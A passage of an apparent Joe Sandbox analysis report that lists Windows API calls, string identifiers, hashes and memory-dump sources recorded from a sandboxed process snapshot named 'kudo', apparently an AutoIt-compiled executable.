                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                      • Instruction ID: 4056635101cf3ab6fcabda0426f57418f0d0dfb2df4106208096979a7513a903
                                                      • Opcode Fuzzy Hash: e73af80c77e745919fdee4ef2b324598bde6f037f27e6417d1a660c11b5f232a
                                                      • Instruction Fuzzy Hash: A3F0823A540612EBE7121B68ED4C9DB773AFF45702B110531F703E50A2DB7A6811CB50
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00878613
                                                      • CharUpperBuffW.USER32(?,?), ref: 00878722
                                                      • VariantClear.OLEAUT32(?), ref: 0087889A
                                                        • Part of subcall function 00867562: VariantInit.OLEAUT32(00000000), ref: 008675A2
                                                        • Part of subcall function 00867562: VariantCopy.OLEAUT32(00000000,?), ref: 008675AB
                                                        • Part of subcall function 00867562: VariantClear.OLEAUT32(00000000), ref: 008675B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      APIs
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • _memset.LIBCMT ref: 00862B87
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862BB6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00862C69
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00862C97
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0085D5D4
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0085D60A
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0085D61B
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0085D69D
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      APIs
                                                      • _memset.LIBCMT ref: 008627C0
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008627DC
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00862822
                                                      • DeleteMenu.USER32(?,00000000,00000000), ref: 0086286B
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087D7C5
                                                        • Part of subcall function 0080784B: _memmove.LIBCMT ref: 00807899
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00858F14
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00858F27
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00858F57
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871872
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008718A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                        • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                        • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00886461
                                                      • LoadLibraryW.KERNEL32(?), ref: 00886468
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0088647D
                                                      • DestroyWindow.USER32(?), ref: 00886485
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00866DBC
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866DEF
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00866E01
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00866E3B
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00866E89
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866EBB
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00866ECC
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00866F06
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                      • Instruction ID: 9418be54c182947257eefb78b6235ca98555805a01c05937af0fa65444fdc8db
                                                      • Opcode Fuzzy Hash: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                      • Instruction Fuzzy Hash: FC21A179500345DBDB209F69DC04A9A77A8FF45724F310B19FDA0D72D0EB71A860CB61
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086AC54
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0086ACA8
                                                      • __swprintf.LIBCMT ref: 0086ACC1
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0088F910), ref: 0086ACFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: 56b3c9979edba42591fe9748e2efe91a0196bb6c7e1bcc2f0f5a7a65e4e70fe8
                                                      • Instruction ID: 777f97665311615b2277d19bc09ab3e7d98ec8f9522bf60b37d9847e28c600fd
                                                      • Opcode Fuzzy Hash: 56b3c9979edba42591fe9748e2efe91a0196bb6c7e1bcc2f0f5a7a65e4e70fe8
                                                      • Instruction Fuzzy Hash: 68214474600109AFCB10DF69DD85DAE7BB8FF49714B004069F909EB352DB35EA51CB62
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00861B19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: e868a6bd33cd5e7259ae5810ae90b7c059a737c239e4fc59eddd6efa8e4f52e1
                                                      • Instruction ID: be06de68fd6ee3c266272138b4f3bc89f88a26bea3efec99d45009ac772b24b3
                                                      • Opcode Fuzzy Hash: e868a6bd33cd5e7259ae5810ae90b7c059a737c239e4fc59eddd6efa8e4f52e1
                                                      • Instruction Fuzzy Hash: E7115E31900119CFCF00EF98D8958EEB7B4FF25304B944465D915E7692EB325D0ACF51
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087EC07
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087EC37
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087ED6A
                                                      • CloseHandle.KERNEL32(?), ref: 0087EDEB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                      • Instruction ID: 7f31689f197b3696fae6b9b05333e5be8ddc52028db2944542d4986c49e94b76
                                                      • Opcode Fuzzy Hash: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                      • Instruction Fuzzy Hash: 38812CB16047109FD760EF28CC86B2AB7E5FF48720F14896DF999DB2D2D670AC408B52
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008800FD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088013C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00880183
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 008801AF
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 008801BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 6fad45d9178879891c8ee354cb57e0105f44c01c329104349eb2ed5c4f6bc587
                                                      • Instruction ID: 55841ba4d44fc690e49c2db5d24d2ae43504ccd4104365b3027b9d65448c49dc
                                                      • Opcode Fuzzy Hash: 6fad45d9178879891c8ee354cb57e0105f44c01c329104349eb2ed5c4f6bc587
                                                      • Instruction Fuzzy Hash: E5511771208204AFD754EF58CC85E6AB7E9FF84314F40892DF596C72A2EB31E949CB52
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • LoadLibraryW.KERNEL32(?), ref: 0087D927
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087D9AA
                                                      • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087D9C6
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087DA07
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087DA21
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 42a3d4a8abfdc3ac0a996c0f617f8c0ed168a8ac18f519daf4ffae2f2a4cd483
                                                      • Instruction ID: 6b396c4f9225338fb6ece996144d1284cc5325303d656fd513ef1ae802cc0e93
                                                      • Opcode Fuzzy Hash: 42a3d4a8abfdc3ac0a996c0f617f8c0ed168a8ac18f519daf4ffae2f2a4cd483
                                                      • Instruction Fuzzy Hash: 9451F035A00219DFCB40EFA8C8859AABBB4FF09324B14C069E959EB352D731ED45CF91
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0086E61F
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0086E648
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0086E687
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0086E6AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0086E6B4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: 4b002d2149f240bdec8272f3a341b8145296ab55a8adaa5dd72c13e76c4508fd
                                                      • Instruction ID: 4eddc5fba38e0a60436b4acab752b9d1710d3c1c08dea3c6495c44b5ab6bb730
                                                      • Opcode Fuzzy Hash: 4b002d2149f240bdec8272f3a341b8145296ab55a8adaa5dd72c13e76c4508fd
                                                      • Instruction Fuzzy Hash: 1D51F879A00105DFCB41EF68C981AAABBF5FF09314B1480A5E949EB3A2CB31ED51DB51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                      • Instruction ID: 403e9c2d089aa4eda0b07298b21a53ba4c4f1609be251a895a3ed2f216004f04
                                                      • Opcode Fuzzy Hash: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                      • Instruction Fuzzy Hash: D941A539904504AFE728EF68CC8CFA9BBA8FB09310F150266F916E72E1D770AD51DB51
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00802357
                                                      • ScreenToClient.USER32(008C57B0,?), ref: 00802374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 16c7976dcd6c52cce9ac275a8d4ad18ee608346650e54476e79782aba6c99f82
                                                      • Instruction ID: 73de9ef1542b966db812c3bba64699f751bd61463b829c093523fc1575b75de1
                                                      • Opcode Fuzzy Hash: 16c7976dcd6c52cce9ac275a8d4ad18ee608346650e54476e79782aba6c99f82
                                                      • Instruction Fuzzy Hash: E8418E75604119FBCF199F68CC48AE9BB74FB45364F20431AF828E22E1CB74A950DF91
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008563E7
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00856433
                                                      • TranslateMessage.USER32(?), ref: 0085645C
                                                      • DispatchMessageW.USER32(?), ref: 00856466
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00856475
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                      • Instruction ID: 8e3907cd551dcbeb87bd811e3d01d8bae9cff225a02ff7fd11ea7bee90ef004f
                                                      • Opcode Fuzzy Hash: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                      • Instruction Fuzzy Hash: 7F317E31A00646AEDB64CFB4DC44FA67BB8FB01306F940165E921C35A1F735A8EDDBA4
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00858A30
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00858ADA
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00858AE2
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00858AF0
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00858AF8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                      • Instruction ID: 868e27c8b2bb2480a05904f23fe267368083de2c0752ed7d53a48a7eb77ed5da
                                                      • Opcode Fuzzy Hash: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                      • Instruction Fuzzy Hash: 5831BF71500229EFDF14CFA8D94DA9E3BB5FB04316F10822AF925E71D1D7B09918DB91
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0085B204
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085B221
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085B259
                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 0085B27F
                                                      • _wcsstr.LIBCMT ref: 0085B289
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: 20f84cb4052ca553d92f39d52f3ea1208d011368a7bdcdcf6d3f4dd31268e59a
                                                      • Instruction ID: c1168932d84f64601e069d52673dbc61845ca165024d4accc2f0eeac70a0ba43
                                                      • Opcode Fuzzy Hash: 20f84cb4052ca553d92f39d52f3ea1208d011368a7bdcdcf6d3f4dd31268e59a
                                                      • Instruction Fuzzy Hash: 2E212531204214BAEB259B39AC09E7F7B98FF59721F104129FC04CA1A2EF61CC809760
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088B192
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0088B1B7
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B1CF
                                                      • GetSystemMetrics.USER32(00000004), ref: 0088B1F8
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0088B216
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 5a4339f5e875394654fae7bf77262c45996851313291b7f4138dd31ce919f303
                                                      • Instruction ID: 8ba0e897a904182b942a938056317a8d7838ae83ec277cf549afe023a8bd4b3e
                                                      • Opcode Fuzzy Hash: 5a4339f5e875394654fae7bf77262c45996851313291b7f4138dd31ce919f303
                                                      • Instruction Fuzzy Hash: 1E21B271A10655AFCB20AF78DC18A6A3BA4FB55321F144738FD32D71E1E7309861CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859320
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859352
                                                      • __itow.LIBCMT ref: 0085936A
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859392
                                                      • __itow.LIBCMT ref: 008593A3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID:
                                                      • API String ID: 2983881199-0
                                                      • Opcode ID: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                      • Instruction ID: 8d5aea6465166369452de3110c56d8298706ed5fde78379c968957ca28a893db
                                                      • Opcode Fuzzy Hash: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                      • Instruction Fuzzy Hash: 4121F531B00208FBDB10AA688C89EEE7BACFB58711F045065FE84D73D1E6B09D498792
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00875A6E
                                                      • GetForegroundWindow.USER32 ref: 00875A85
                                                      • GetDC.USER32(00000000), ref: 00875AC1
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00875ACD
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00875B08
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
